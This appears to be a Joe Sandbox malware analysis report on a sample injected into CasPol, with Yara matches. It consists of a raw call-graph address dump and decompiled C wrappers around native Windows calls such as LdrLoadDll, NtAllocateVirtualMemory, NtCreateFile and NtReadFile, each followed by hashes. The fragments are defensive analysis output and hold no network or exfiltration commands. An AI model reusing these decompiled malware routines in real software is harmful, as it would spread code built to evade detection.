33773->33781 33776 41e6e3 2 API calls 33774->33776 33775 418d5e 33778 41e6e3 2 API calls 33775->33778 33779 418c08 33776->33779 33780 41e6e3 2 API calls 33777->33780 33782 418d69 33778->33782 33779->33714 33783 418c22 33780->33783 33786 418c34 33781->33786 33809 420233 33781->33809 33782->33714 33783->33714 33795 418c43 33786->33795 33812 41e663 33786->33812 33787 418c97 33788 418cae 33787->33788 33820 41e4f3 LdrLoadDll 33787->33820 33790 418cb5 33788->33790 33791 418cca 33788->33791 33793 41e6e3 2 API calls 33790->33793 33792 41e6e3 2 API calls 33791->33792 33794 418cd3 33792->33794 33793->33795 33796 418cff 33794->33796 33815 41ff53 33794->33815 33795->33714 33796->33714 33798 418cea 33799 420153 2 API calls 33798->33799 33800 418cf3 33799->33800 33800->33714 33801->33687 33802->33707 33804 419475 33803->33804 33805 41f223 LdrLoadDll 33803->33805 33806 41e573 LdrLoadDll 33804->33806 33805->33804 33806->33712 33807->33695 33808->33758 33811 42024b 33809->33811 33822 41e883 33809->33822 33811->33786 33813 41e67f NtReadFile 33812->33813 33814 41f223 LdrLoadDll 33812->33814 33813->33787 33814->33813 33816 41ff60 33815->33816 33817 41ff77 33815->33817 33816->33817 33818 420233 2 API calls 33816->33818 33817->33798 33819 41ff8e 33818->33819 33819->33798 33820->33788 33821->33775 33823 41f223 LdrLoadDll 33822->33823 33824 41e89f RtlAllocateHeap 33823->33824 33824->33811 33956 41e793 33825->33956 33827 420100 33827->33720 33829 4187b4 33828->33829 33831 4187bc 33828->33831 33829->33722 33830 418a8f 33830->33722 33831->33830 33959 4212d3 33831->33959 33833 418810 33834 4212d3 2 API calls 33833->33834 33838 41881b 33834->33838 33835 418869 33837 4212d3 2 API calls 33835->33837 33841 41887d 33837->33841 33838->33835 33839 421403 3 API calls 33838->33839 33970 421373 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33838->33970 33839->33838 33840 4188da 33842 4212d3 2 API calls 33840->33842 33841->33840 33964 421403 33841->33964 33843 4188f0 33842->33843 33845 41892d 33843->33845 33847 421403 3 API calls 33843->33847 33846 4212d3 2 API calls 33845->33846 33848 418938 33846->33848 33847->33843 33849 421403 3 API calls 33848->33849 33856 418972 33848->33856 33849->33848 33851 418a67 33972 421333 LdrLoadDll RtlFreeHeap 33851->33972 33853 418a71 33973 421333 LdrLoadDll RtlFreeHeap 33853->33973 33855 418a7b 33974 421333 LdrLoadDll RtlFreeHeap 33855->33974 33971 421333 LdrLoadDll RtlFreeHeap 33856->33971 33858 418a85 33975 421333 LdrLoadDll RtlFreeHeap 33858->33975 33861 419b14 33860->33861 33862 4191a3 8 API calls 33861->33862 33867 419b2a 33862->33867 33863 419b33 33863->33725 33864 419b6a 33865 420153 2 API calls 33864->33865 33866 419b7b 33865->33866 33866->33725 33867->33863 33867->33864 33868 419bb6 33867->33868 33869 420153 2 API calls 33868->33869 33870 419bbb 33869->33870 33870->33725 33872 41f027 33871->33872 33873 41eea3 LdrLoadDll 33871->33873 33976 41eea3 33872->33976 33873->33872 33875 41f030 33876 41eea3 LdrLoadDll 33875->33876 33877 41f039 33876->33877 33878 41eea3 LdrLoadDll 33877->33878 33879 41f042 33878->33879 33880 41eea3 LdrLoadDll 33879->33880 33881 41f04b 33880->33881 33882 41eea3 LdrLoadDll 33881->33882 33883 41f054 33882->33883 33884 41eea3 LdrLoadDll 33883->33884 33885 41f060 33884->33885 33886 41eea3 LdrLoadDll 33885->33886 33887 41f069 33886->33887 33888 41eea3 LdrLoadDll 33887->33888 33889 41f072 33888->33889 33890 41eea3 LdrLoadDll 33889->33890 33891 41f07b 33890->33891 33892 41eea3 LdrLoadDll 33891->33892 33893 41f084 33892->33893 33894 41eea3 LdrLoadDll 33893->33894 33895 41f08d 33894->33895 33896 41eea3 LdrLoadDll 33895->33896 33897 41f099 33896->33897 33898 41eea3 LdrLoadDll 33897->33898 33899 41f0a2 33898->33899 33900 41eea3 LdrLoadDll 33899->33900 33901 41f0ab 33900->33901 33902 41eea3 LdrLoadDll 33901->33902 33903 41f0b4 33902->33903 33904 41eea3 LdrLoadDll 33903->33904 33905 41f0bd 33904->33905 33906 41eea3 LdrLoadDll 33905->33906 33907 41f0c6 33906->33907 33908 41eea3 LdrLoadDll 33907->33908 33909 41f0d2 33908->33909 33910 41eea3 LdrLoadDll 33909->33910 33911 41f0db 33910->33911 33912 41eea3 LdrLoadDll 33911->33912 33913 41f0e4 33912->33913 33914 41eea3 LdrLoadDll 33913->33914 33915 41f0ed 33914->33915 33916 41eea3 LdrLoadDll 33915->33916 33917 41f0f6 33916->33917 33918 41eea3 LdrLoadDll 33917->33918 33919 41f0ff 33918->33919 33920 41eea3 LdrLoadDll 33919->33920 33921 41f10b 33920->33921 33922 41eea3 LdrLoadDll 33921->33922 33923 41f114 33922->33923 33924 41eea3 LdrLoadDll 33923->33924 33925 41f11d 33924->33925 33926 41eea3 LdrLoadDll 33925->33926 33927 41f126 33926->33927 33928 41eea3 LdrLoadDll 33927->33928 33929 41f12f 33928->33929 33930 41eea3 LdrLoadDll 33929->33930 33931 41f138 33930->33931 33932 41eea3 LdrLoadDll 33931->33932 33933 41f144 33932->33933 33934 41eea3 LdrLoadDll 33933->33934 33935 41f14d 33934->33935 33936 41eea3 LdrLoadDll 33935->33936 33937 41f156 33936->33937 33938 41eea3 LdrLoadDll 33937->33938 33939 41f15f 33938->33939 33940 41eea3 LdrLoadDll 33939->33940 33941 41f168 33940->33941 33942 41eea3 LdrLoadDll 33941->33942 33943 41f171 33942->33943 33944 41eea3 LdrLoadDll 33943->33944 33945 41f17d 33944->33945 33946 41eea3 LdrLoadDll 33945->33946 33947 41f186 33946->33947 33948 41eea3 LdrLoadDll 33947->33948 33949 41f18f 33948->33949 33949->33730 33951 41f223 LdrLoadDll 33950->33951 33952 41e12f 33951->33952 33982 1669860 LdrInitializeThunk 33952->33982 33953 41e146 33953->33732 33955->33727 33957 41f223 LdrLoadDll 33956->33957 33958 41e7af NtAllocateVirtualMemory 33957->33958 33958->33827 33960 4212e3 33959->33960 33961 4212e9 33959->33961 33960->33833 33962 420233 2 API calls 33961->33962 33963 42130f 33962->33963 33963->33833 33965 421373 33964->33965 33966 4213d0 33965->33966 33967 420233 2 API calls 33965->33967 33966->33841 33968 4213ad 33967->33968 33969 420153 2 API calls 33968->33969 33969->33966 33970->33838 33971->33851 33972->33853 33973->33855 33974->33858 33975->33830 33977 41eebe 33976->33977 33978 4195b3 LdrLoadDll 33977->33978 33979 41eede 33978->33979 33980 4195b3 LdrLoadDll 33979->33980 33981 41ef92 33979->33981 33980->33981 33981->33875 33981->33981 33982->33953 33984 1669681 33983->33984 33985 166968f LdrInitializeThunk 33983->33985 33984->33736 33985->33736 33987 41e8df RtlFreeHeap 33986->33987 33988 41f223 LdrLoadDll 33986->33988 33987->33740 33988->33987 33990 4093f3 33989->33990 33991 4093ee 33989->33991 33992 4200d3 2 API calls 33990->33992 33991->33671 33998 409418 33992->33998 33993 40947b 33993->33671 33994 41e113 2 API calls 33994->33998 33995 409481 33997 4094a7 33995->33997 33999 41e813 2 API calls 33995->33999 33997->33671 33998->33993 33998->33994 33998->33995 34000 4200d3 2 API calls 33998->34000 34005 41e813 33998->34005 34001 409498 33999->34001 34000->33998 34001->33671 34003 4096c1 34002->34003 34004 41e813 2 API calls 34002->34004 34003->33632 34004->34003 34006 41f223 LdrLoadDll 34005->34006 34007 41e82f 34006->34007 34010 16696e0 LdrInitializeThunk 34007->34010 34008 41e846 34008->33998 34010->34008 34012 41f8b6 34011->34012 34013 40ced3 LdrLoadDll 34012->34013 34014 40bd84 34013->34014 34014->33640 34016 40d246 34015->34016 34018 40d2c3 34016->34018 34027 41dee3 LdrLoadDll 34016->34027 34018->33645 34020 41ea42 LookupPrivilegeValueW 34019->34020 34021 41f223 LdrLoadDll 34019->34021 34020->33649 34021->34020 34023 41e4cf 34022->34023 34024 41f223 LdrLoadDll 34022->34024 34028 1669910 LdrInitializeThunk 34023->34028 34024->34023 34025 41e4ee 34025->33652 34027->34018 34028->34025 34030 40d3ca 34029->34030 34031 40d223 LdrLoadDll 34030->34031 34032 40d42d 34031->34032 34032->33602 34034 40ff7d 34033->34034 34042 410033 34033->34042 34035 40d223 LdrLoadDll 34034->34035 34036 40ff9f 34035->34036 34043 41e193 34036->34043 34038 40ffe1 34039 410027 34038->34039 34047 41e1d3 34038->34047 34041 41e6e3 2 API calls 34039->34041 34041->34042 34042->33605 34042->33606 34044 41e1a9 34043->34044 34045 41f223 LdrLoadDll 34044->34045 34046 41e1af 34045->34046 34046->34038 34048 41e1ef 34047->34048 34049 41f223 LdrLoadDll 34047->34049 34052 1669fe0 LdrInitializeThunk 34048->34052 34049->34048 34050 41e206 34050->34039 34052->34050 34054 40dd44 34053->34054 34055 40d3a3 LdrLoadDll 34054->34055 34056 40ddb5 34055->34056 34089 40d023 34056->34089 34058 40e02c 34058->33619 34059 40dddb 34059->34058 34098 418ad3 34059->34098 34061 40de20 34061->34058 34101 40a013 34061->34101 34063 40de64 34063->34058 34123 41e753 34063->34123 34067 40deba 34068 40dec1 34067->34068 34135 41e263 34067->34135 34070 420153 2 API calls 34068->34070 34072 40dece 34070->34072 34072->33619 34073 40df0b 34074 420153 2 API calls 34073->34074 34075 40df12 34074->34075 34075->33619 34076 40df1b 34077 410123 3 API calls 34076->34077 34078 40df8f 34077->34078 34078->34068 34079 40df9a 34078->34079 34080 420153 2 API calls 34079->34080 34081 40dfbe 34080->34081 34141 41e2b3 34081->34141 34084 41e263 2 API calls 34085 40dff9 34084->34085 34085->34058 34146 41e073 34085->34146 34088 41e903 2 API calls 34088->34058 34090 40d030 34089->34090 34091 40d034 34089->34091 34090->34059 34092 40d04d 34091->34092 34093 40d07f 34091->34093 34151 41df23 LdrLoadDll 34092->34151 34152 41df23 LdrLoadDll 34093->34152 34095 40d090 34095->34059 34097 40d06f 34097->34059 34099 410123 3 API calls 34098->34099 34100 418af9 34098->34100 34099->34100 34100->34061 34153 40a243 34101->34153 34103 40a239 34103->34063 34104 40a031 34104->34103 34105 4093e3 4 API calls 34104->34105 34106 40a10f 34104->34106 34114 40a06f 34105->34114 34106->34103 34108 4093e3 4 API calls 34106->34108 34110 40a1ef 34106->34110 34117 40a14c 34108->34117 34109 40a203 34109->34103 34201 410393 10 API calls 34109->34201 34110->34103 34200 410393 10 API calls 34110->34200 34112 40a219 34112->34103 34202 410393 10 API calls 34112->34202 34114->34106 34118 40a105 34114->34118 34167 409cf3 34114->34167 34115 40a22f 34115->34063 34117->34110 34120 409cf3 14 API calls 34117->34120 34121 40a1e5 34117->34121 34119 4096a3 2 API calls 34118->34119 34119->34106 34120->34117 34122 4096a3 2 API calls 34121->34122 34122->34110 34124 41f223 LdrLoadDll 34123->34124 34125 41e76f 34124->34125 34284 16698f0 LdrInitializeThunk 34125->34284 34126 40de9b 34128 410123 34126->34128 34129 410140 34128->34129 34285 41e213 34129->34285 34132 410188 34132->34067 34133 41e263 2 API calls 34134 4101b1 34133->34134 34134->34067 34136 41e269 34135->34136 34137 41f223 LdrLoadDll 34136->34137 34138 41e27f 34137->34138 34291 1669780 LdrInitializeThunk 34138->34291 34139 40defe 34139->34073 34139->34076 34142 41f223 LdrLoadDll 34141->34142 34143 41e2cf 34142->34143 34292 16697a0 LdrInitializeThunk 34143->34292 34144 40dfd2 34144->34084 34147 41f223 LdrLoadDll 34146->34147 34148 41e08f 34147->34148 34293 1669a20 LdrInitializeThunk 34148->34293 34149 40e025 34149->34088 34151->34097 34152->34095 34154 40a26a 34153->34154 34155 4093e3 4 API calls 34154->34155 34162 40a4cf 34154->34162 34156 40a2bd 34155->34156 34157 4096a3 2 API calls 34156->34157 34156->34162 34158 40a34c 34157->34158 34159 4093e3 4 API calls 34158->34159 34158->34162 34160 40a361 34159->34160 34161 4096a3 2 API calls 34160->34161 34160->34162 34165 40a3c1 34161->34165 34162->34104 34163 4093e3 4 API calls 34163->34165 34164 409cf3 14 API calls 34164->34165 34165->34162 34165->34163 34165->34164 34166 4096a3 2 API calls 34165->34166 34166->34165 34168 409d18 34167->34168 34203 41df63 34168->34203 34171 409d6c 34171->34114 34172 409ded 34236 410273 LdrLoadDll NtClose 34172->34236 34173 41e153 2 API calls 34174 409d90 34173->34174 34174->34172 34176 409d9b 34174->34176 34178 409e19 34176->34178 34206 40e043 34176->34206 34177 409e08 34179 409e25 34177->34179 34180 409e0f 34177->34180 34178->34114 34237 41dfe3 LdrLoadDll 34179->34237 34182 41e6e3 2 API calls 34180->34182 34182->34178 34183 409db5 34183->34178 34226 409b23 34183->34226 34185 409e50 34188 40e043 5 API calls 34185->34188 34189 409e70 34188->34189 34189->34178 34238 41e013 LdrLoadDll 34189->34238 34191 409e95 34239 41e0a3 LdrLoadDll 34191->34239 34193 409eaf 34194 41e073 2 API calls 34193->34194 34195 409ebe 34194->34195 34196 41e6e3 2 API calls 34195->34196 34197 409ec8 34196->34197 34240 4098f3 34197->34240 34199 409edc 34199->34114 34200->34109 34201->34112 34202->34115 34204 409d62 34203->34204 34205 41f223 LdrLoadDll 34203->34205 34204->34171 34204->34172 34204->34173 34205->34204 34207 40e071 34206->34207 34208 410123 3 API calls 34207->34208 34209 40e0d3 34208->34209 34210 40e11c 34209->34210 34211 41e263 2 API calls 34209->34211 34210->34183 34212 40e0fe 34211->34212 34213 40e108 34212->34213 34216 40e128 34212->34216 34214 41e2b3 2 API calls 34213->34214 34215 40e112 34214->34215 34217 41e6e3 2 API calls 34215->34217 34218 40e1b2 34216->34218 34219 40e195 34216->34219 34217->34210 34221 41e2b3 2 API calls 34218->34221 34220 41e6e3 2 API calls 34219->34220 34222 40e19f 34220->34222 34223 40e1c1 34221->34223 34222->34183 34224 41e6e3 2 API calls 34223->34224 34225 40e1cb 34224->34225 34225->34183 34227 409b39 34226->34227 34232 409cc4 34227->34232 34256 4096e3 34227->34256 34229 409c38 34230 4098f3 11 API calls 34229->34230 34229->34232 34231 409c66 34230->34231 34231->34232 34233 41e153 2 API calls 34231->34233 34232->34114 34234 409c9b 34233->34234 34234->34232 34235 41e753 2 API calls 34234->34235 34235->34232 34236->34177 34237->34185 34238->34191 34239->34193 34241 40991c 34240->34241 34263 409853 34241->34263 34244 41e753 2 API calls 34245 40992f 34244->34245 34245->34244 34246 4099ba 34245->34246 34249 4099b5 34245->34249 34271 4102f3 34245->34271 34246->34199 34247 41e6e3 2 API calls 34248 4099ed 34247->34248 34248->34246 34250 41df63 LdrLoadDll 34248->34250 34249->34247 34251 409a52 34250->34251 34251->34246 34275 41dfa3 34251->34275 34253 409ab6 34253->34246 34254 4191a3 8 API calls 34253->34254 34255 409b0b 34254->34255 34255->34199 34257 4097e2 34256->34257 34258 4096f8 34256->34258 34257->34229 34258->34257 34259 4191a3 8 API calls 34258->34259 34260 409765 34259->34260 34261 420153 2 API calls 34260->34261 34262 40978c 34260->34262 34261->34262 34262->34229 34264 40986d 34263->34264 34265 40ced3 LdrLoadDll 34264->34265 34266 409888 34265->34266 34267 4195b3 LdrLoadDll 34266->34267 34268 4098a0 34267->34268 34269 4098bc 34268->34269 34270 4098a9 PostThreadMessageW 34268->34270 34269->34245 34270->34269 34272 410306 34271->34272 34278 41e0e3 34272->34278 34276 41dfbf 34275->34276 34277 41f223 LdrLoadDll 34275->34277 34276->34253 34277->34276 34279 41f223 LdrLoadDll 34278->34279 34280 41e0ff 34279->34280 34283 1669840 LdrInitializeThunk 34280->34283 34281 410331 34281->34245 34283->34281 34284->34126 34286 41e22f 34285->34286 34287 41f223 LdrLoadDll 34285->34287 34290 16699a0 LdrInitializeThunk 34286->34290 34287->34286 34288 410181 34288->34132 34288->34133 34290->34288 34291->34139 34292->34144 34293->34149 34294 1669540 LdrInitializeThunk

                                                                Executed Functions

                                                                Function 0041E6DE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 41e6de-41e70c call 41f223 NtClose
                                                                C-Code - Quality: 75%
                                                                			E0041E6DE(intOrPtr _a8, void* _a12) {
				long _t9;

				_pop(ds);
				_t6 = _a8;
				E0041F223( *((intOrPtr*)(_a8 + 0x14)), _t6, _t6 + 0xa7c,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x2c);
				_t9 = NtClose(_a12); // executed
				return _t9;
			}




                                                                0x0041e6de
                                                                0x0041e6e6
                                                                0x0041e6fa
                                                                0x0041e708
                                                                0x0041e70c

                                                                APIs
                                                                • NtClose.NTDLL(004102D8,00000000,?,004102D8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E708
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID: <sxU
                                                                • API String ID: 3535843008-837359753
                                                                • Opcode ID: eabc21bdcd6ea92364193cc9ee7acf91f5b54f9ce4ff6891967a2d9bc80cbf6c
                                                                • Instruction ID: e3c2678bfc3d18e5bdd51e0d2f0159d6e95c5575b293d6a9d07cabfcab0a19f7
                                                                • Opcode Fuzzy Hash: eabc21bdcd6ea92364193cc9ee7acf91f5b54f9ce4ff6891967a2d9bc80cbf6c
                                                                • Instruction Fuzzy Hash: 55E012766042146BD710EBD8EC45FD77B68DF48764F018495BA1D9B742C171EA0187E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040CED3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 286 40ced3-40cefc call 420ef3 289 40cf02-40cf10 call 421413 286->289 290 40cefe-40cf01 286->290 293 40cf20-40cf31 call 41f793 289->293 294 40cf12-40cf1d call 421693 289->294 299 40cf33-40cf47 LdrLoadDll 293->299 300 40cf4a-40cf4d 293->300 294->293 299->300
                                                                C-Code - Quality: 100%
                                                                			E0040CED3(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420EF3( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421413(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421693( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F793(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                0x0040ceef
                                                                0x0040cef2
                                                                0x0040cef7
                                                                0x0040cefc
                                                                0x0040cf06
                                                                0x0040cf0b
                                                                0x0040cf0e
                                                                0x0040cf10
                                                                0x0040cf18
                                                                0x0040cf1d
                                                                0x0040cf1d
                                                                0x0040cf24
                                                                0x0040cf2c
                                                                0x0040cf2f
                                                                0x0040cf31
                                                                0x0040cf45
                                                                0x00000000
                                                                0x0040cf47
                                                                0x0040cf4d
                                                                0x0040cf01
                                                                0x0040cf01
                                                                0x0040cf01

                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF45
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 51f88520c29db4d47c07e15d5e3de82b87644f0aaa3e216130af3a830edd7316
                                                                • Instruction ID: 14337de2c8164343ddf43ba7c008c11142b32e495126f731bf4d8c427d14e85f
                                                                • Opcode Fuzzy Hash: 51f88520c29db4d47c07e15d5e3de82b87644f0aaa3e216130af3a830edd7316
                                                                • Instruction Fuzzy Hash: DB0175B1E4010EA7DF10DBE5DC86FDEB378AB14308F0041A6F908A7280F634EB448755
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E78D Relevance: 1.5, APIs: 1, Instructions: 47memorynativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 301 41e78d-41e791 302 41e793-41e7d0 call 41f223 NtAllocateVirtualMemory 301->302 303 41e7f7-41e807 301->303 305 41e80a-41e80c 303->305 307 41e808 call 1669a00 303->307 307->305
                                                                C-Code - Quality: 58%
                                                                			E0041E78D(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				asm("daa");
				asm("loope 0x66");
				_t10 = _a4;
				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                0x0041e790
                                                                0x0041e791
                                                                0x0041e796
                                                                0x0041e7aa
                                                                0x0041e7cc
                                                                0x0041e7d0

                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7CC
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: ea6c9640f696ffcbb8ef467a3fd4bd55dd179215d0a24c7b78f8742336ef80f9
                                                                • Instruction ID: 9eed084d59b35aee01eabfd0b84f505de1ffaf69c883ee217f57e7c7ad5304d3
                                                                • Opcode Fuzzy Hash: ea6c9640f696ffcbb8ef467a3fd4bd55dd179215d0a24c7b78f8742336ef80f9
                                                                • Instruction Fuzzy Hash: B60169B6200219ABCB18DF98DC85EEB73ADEF8C314F108519FA5C9B241C631E811CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E5B3 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 316 41e5b3-41e604 call 41f223 NtCreateFile
                                                                C-Code - Quality: 100%
                                                                			E0041E5B3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                0x0041e5c2
                                                                0x0041e5ca
                                                                0x0041e600
                                                                0x0041e604

                                                                APIs
                                                                • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E600
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                • Instruction ID: 349c678bcadd4c2aad84a336dbb19fe8c8e16f703881d3bb26f008437893ce07
                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                • Instruction Fuzzy Hash: 5EF0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E65D Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 319 41e65d-41e6ac call 41f223 NtReadFile
                                                                APIs
                                                                • NtReadFile.NTDLL(004194D3,004149A3,FFFFFFFF,00418FB6,00000002,?,004194D3,00000002,00418FB6,FFFFFFFF,004149A3,004194D3,00000002,00000000), ref: 0041E6A8
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 37569995663c40e8c7eafb3225fe40729b80976e86f14d781ad79531e4009e6b
                                                                • Instruction ID: ae7f0bf4d196d4e2566f87fe891c19ac8d2e709bee0c1b01132405288b5634cf
                                                                • Opcode Fuzzy Hash: 37569995663c40e8c7eafb3225fe40729b80976e86f14d781ad79531e4009e6b
                                                                • Instruction Fuzzy Hash: 03F0E7B2200208ABCB14DF99DC84EDB77ADEF8C714F118659BA0D97241C631EC11CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E663 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 322 41e663-41e679 323 41e67f-41e6ac NtReadFile 322->323 324 41e67a call 41f223 322->324 324->323
                                                                C-Code - Quality: 37%
                                                                			E0041E663(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                0x0041e672
                                                                0x0041e672
                                                                0x0041e67a
                                                                0x0041e6a8
                                                                0x0041e6ac

                                                                APIs
                                                                • NtReadFile.NTDLL(004194D3,004149A3,FFFFFFFF,00418FB6,00000002,?,004194D3,00000002,00418FB6,FFFFFFFF,004149A3,004194D3,00000002,00000000), ref: 0041E6A8
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                • Instruction ID: 768f1dcd7fb2369f3f92b11411ed061d62c583105e964bb784e8ecccf354e01b
                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                • Instruction Fuzzy Hash: FDF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BA0DA7241C630E8118BA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E793 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0041E793(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                0x0041e7aa
                                                                0x0041e7cc
                                                                0x0041e7d0

                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7CC
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
